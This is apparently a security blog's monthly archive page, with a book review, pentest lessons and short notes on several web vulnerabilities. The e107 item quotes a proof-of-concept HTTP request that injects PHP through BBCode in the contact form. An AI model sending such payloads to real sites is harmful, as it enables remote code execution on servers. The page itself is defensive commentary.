Posts

Showing posts from January, 2011

[Book-Review] The Myths of Security: What the Computer Security Industry Doesn't Want You to Know

Image
This book written by John Viega is meant mainly for non-security IT professionals and technical savvy people. The author highlighted his thoughts on - why AV fails, why we might get 0wned though we make safe caution against threat, why https fails, why IDS sucks, why CaptCha sucks, why responsible disclosure isn't responsible, why application security hasn't been achieved or won't be achieved  for always.
With the price of used book at $7.36~, it's worth to learn ideas from someone who have been in IT Security for many years and have written several security books (Building security softwares, Secure Programming Cookboook, 19 deadly sins of software,...etc).

Common Enterprise Weakness: Only scan this and that server

Case Study:
https://www.trustwave.com/downloads/Trustwave-Case-Study-Internal-Penetration-Test.pdf


Analysis:
TrustWave team pointed out that via insecure network segment, they eventually compromised the highly critical network segment that processes payment card information.

Lesson Learnt:
Based on our experience, nowadays small and medium (sometimes, even big) enterprise hire pentest services only for their critical servers whilst they fail to secure all their work station on different network segment portions. Password issues (weak password, blank password of both OS and other servers of database/commercial applications) are always common in some organizations because of the laziness of system admins there even if there is a written policy and rule for setting strong passwords.
According to the case study, TrustWave team would find it harder to attack probably tightened payment card network if they targeted only that portion. We're sure that TrustWave would explain to and negotiate w…

e107 Remote Code Execution via BBCode (aka Attacking Flaws in BBCode)

Vulnerability:
http://php-security.org/2010/05/19/mops-2010-035-e107-bbcode-remote-php-code-execution-vulnerability/index.html


Analysis:
Due to the sole reason of providing full capability and control over application, nowadays' web developers provide a feature that allows application admin users to run arbitrary PHP codes via applications. e107 CMS is not the only one. Drupal CMS also has this feature.


[CODE] $text = preg_replace("#\[(php)#i", "[\\1", $text); [/CODE]
PoC exploit is noted as:

--------------------------------------------------------------------------------------------
POST /contact.php HTTP/1.1
Host: xxxx
User-Agent: e107 0.7.20 Remote Code Execution Exploit
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

send-contactus=1&author_name=[php]phpinfo()%3bdie()%3b[/php]
--------------------------------------------------------------------------------------------

Similarly, AEF (Advanced Electron Forum)  had flawed bbCode implementati…

Few Banking Security Resources

Autorun

Image
One of the reasons of malware spreading via readable/writable media in Windows platform is

Windows itself enables Autorun by default Some applications even ask users to enable Autorun if disabled. 

Hacking Auto-Complete

Jeremiah's Research:
http://www.slideshare.net/jeremiahgrossman/breaking-browsers-hacking-autocomplete-blackhat-usa-2010


Established Recommendation:
Disable "autocomplete" or Set autocomplete="off" in input tag password field.
This is 99% ignored by majority of web developers today.


Myth:
Before Jeremiah's Research, it was widely believed that this autocomplete issue is ONLY a local privacy issue. Attackers who physically gain access to a victim's machine can gain access to his browser autocomplete values.


Lesson Learnt:
Research security-related recommendations that have been acted upon issues which are considered as low-risk or impossible-to-happen.

Work harder or think out of the box to create an amazingly PoC that transforms such low-risk to medium/high one.

Weak Fraud Check vulnerable to Brute Force

Image
We've seen a fraud check is being used in some web applications such as billings, and email registration such as Gmail. Here, a traditional habit is still used by developers. This is verification by digits only.